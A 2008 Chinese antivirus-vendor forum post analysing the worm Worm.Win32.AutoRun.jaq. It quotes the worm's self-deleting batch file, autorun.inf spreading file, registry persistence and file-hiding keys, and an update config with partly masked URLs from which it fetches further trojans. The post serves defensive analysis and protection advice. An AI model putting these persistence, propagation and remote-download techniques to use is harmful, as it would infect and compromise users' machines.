»
游客:
注册
|
登录
|
帮助
微点交流论坛
»
病毒快报
» 蠕虫程序Worm.Win32.AutoRun.jaq
作者:
标题: 蠕虫程序Worm.Win32.AutoRun.jaq
pioneer
超级版主
积分 4563
发帖 4545
注册 2007-7-16
来自 BJ
#1
蠕虫程序Worm.Win32.AutoRun.jaq
Worm.Win32.AutoRun.jaq
捕获时间
2008-12-26
病毒摘要
该样本是使用“VC”编写的蠕虫程序,由微点主动防御软件自动捕获,采用“nSPack”加壳方式试图躲避特征码扫描,加壳后长度为“18,470 字节”,图标为“
”,病毒扩展名为“exe”,主要通过“网页木马”、“文件捆绑”、“移动存储介质”等方式传播,运行后病毒主要感染文件并联网下载其他木马到本地运行。
感染对象
Windows 2000/Windows XP/Windows 2003
传播途径
网页木马、文件捆绑、移动存储介质
防范措施
已安装使用微点主动防御软件的用户,无须任何设置,微点主动防御将自动保护您的系统免受该病毒的入侵和破坏。无论您是否已经升级到最新版本,微点主动防御都能够有效清除该病毒。如果您没有将微点主动防御软件升级到最新版,微点主动防御软件在发现该病毒后将报警提示您发现“未知间谍软件”,请直接选择删除处理(如图1);
图1 微点主动防御软件自动捕获未知病毒(未升级)
如果您已经将微点主动防御软件升级到最新版本,微点将报警提示您发现"Worm.Win32.AutoRun.jaq”,请直接选择删除(如图2)。
图2 微点主动防御软件升级后截获已知病毒
对于未使用微点主动防御软件的用户,微点反病毒专家建议
:
1、不要在不明站点下载非官方版本的软件进行安装,避免病毒通过捆绑的方式进入您的系统。
2、建议关闭U盘自动播放,具体操作步骤:开始->运行->gpedit.msc->计算机配置->管理模板->系统->在右侧找到"关闭自动播放"->双击->选择"已启用"。
3、尽快将您的杀毒软件特征库升级到最新版本进行查杀,并开启防火墙拦截网络异常访问,如依然有异常情况请注意及时与专业的安全软件厂商联系获取技术支持。
4、开启windows自动更新,及时打好漏洞补丁。
[
Last edited by pioneer on 2008-12-30 at 17:19
]
※文章所有权归【pioneer】与【东方微点论坛】共同所有,转载请注明出处!※
2008-12-26 17:06
pioneer
超级版主
积分 4563
发帖 4545
注册 2007-7-16
来自 BJ
#2
病毒分析
该样本程序被执行后,将复制自身至系统目录“%SystemRoot%\system32”,重命名为“7CE81C8.EXE”,修改注册表,将“7CE81C8.EXE”注册为名为“93088076”的服务,实现自启动,相关注册表如下:
Quote:
键:“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\93088076”
值:“Type”
数据:“SERVICE WIN32 OWN PROCESS”
值:“Start”
数据:“SERVICE AUTO START”
值:“ImagePath”
数据:“C:\WINDOWS\system32\7CE81C8.EXE -k”
值:“DisplayName”
数据:“93088076”
服务建立后,病毒将启动服务,并释放批处理文件“delme.bat”至系统目录“%SystemRoot%\system32”,实现自删除,批处理内容如下:
Quote:
@echo off
:selfkill
del /F /Q "C:\Sample.exe"
if exist "C:Sample.exe" goto selfkill
del %0
服务启动后,“7CE81C8.EXE”释放动态库文件“232A68F8.DLL”至系统目录“%SystemRoot%\system32”,申请内存空间将动态库“232A68F8.DLL”写入系统进程“winlogon.exe”,使用远程线程激活被写入的病毒代码实现注入,随后“winlogon.exe”将尝试注入系统当前存在全部进程。
遍历磁盘,尝试将“7CE81C8.EXE”复制至各磁盘根目录,重命名为“auto.exe”,并生成“autorun.inf”,使“auto.exe”随用户打开盘符时运行,并将文件设置为隐藏属性。“autorun.inf”内容如下:
Quote:
[AutoRun]
open=auto.exe
shellexecute=auto.exe
shell\Auto\command=auto.exe
修改注册表,企图使文件不可见,相关注册表如下:
Quote:
键:“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue”
值:“CheckedValue”
数据:“0”
访问网络地址:
http://count.fu
****ion.com/cnzz/update.txt,读取升级文件、下载恶意程序、上传统计信息。Updat.txt内容如下:
Quote:
[update] ver=2008040422 url=http://count.fu****ion.com/cnzz/soft/cnzz.exe timer=1 timerbegin=0 [popwin] popwin=0 count=0 [file] file=1 file1=http://ad.l***n.com/ad.exe filename1=skkj1.exe ftime1=0 file2=http://google.n***dn.com/cao/cao.exe filename2=skkj2.exe ftime2=0 count=2 [count] count=1 mecount=1 url=http://count.fu****ion.com/cnzz/count/count.asp
※文章所有权归【pioneer】与【东方微点论坛】共同所有,转载请注明出处!※
2008-12-26 17:07
论坛跳转:
微点软件公测区
安全快报
> 病毒快报
> 漏洞快报
微点产品在线技术支持
> 微点主动防御软件
> 预升级反馈专区
> 微点杀毒软件
微点用户交流区
> 微点新闻
> 微点软件使用交流
> 微点茶室
安全技术交流区
> 主动防御
> 反病毒
> 防火墙
综合区
> 电脑&数码
> 体育&娱乐&休闲
> 灌水区
版务管理
内部使用专区
可打印版本
|
推荐
|
订阅
|
收藏
[
联系我们
-
东方微点
]
北京东方微点信息技术有限责任公司 福建东方微点信息安全有限责任公司
闽ICP备05030815号